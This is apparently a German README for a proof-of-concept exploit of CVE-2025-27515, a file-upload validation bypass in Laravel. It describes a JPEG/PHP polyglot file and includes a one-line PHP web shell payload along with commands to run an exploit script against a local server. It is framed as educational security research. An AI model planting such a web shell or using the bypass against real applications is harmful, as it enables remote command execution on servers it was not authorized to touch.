
PoC für CVE-2025-27515
Eine praktische Demonstration von CVE-2025-27515, einer Schwachstelle zur Umgehung der Datei-Upload-Validierung im Laravel-Framework (≤ 12.0.0).
CVE-2025-27515 ist eine Validierungsumgehung, die es Angreifern ermöglicht, Datei-Upload-Beschränkungen zu umgehen, wenn Laravel-Anwendungen Wildcard-Validierungsmuster (files.*) verwenden. Die Schwachstelle ermöglicht das Hochladen schädlicher Dateien, indem sie Schwächen bei der Verarbeitung array-basierter Datei-Uploads durch Laravel ausnutzt.
Schweregrad: Mittel/Hoch
CWE: CWE-20 (Fehlerhafte Eingabevalidierung)
Der Exploit verwendet eine Polyglot-JPEG+PHP-Datei, die:
FF D8 FF E0) enthält, um die MIME-Typ-Validierung zu umgehen<?php system($_GET['cmd']); ?>).jpg-Erweiterung verwendet, um die Dateierweiterungsprüfungen zu bestehenphp artisan serve
# Access at http://localhost:8000/upload
Python-Version:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
NUR FÜR LEHRZWECKE UND AUTORISIERTE SICHERHEITSTESTS
Von Guaxinim | Cybersicherheitsforschung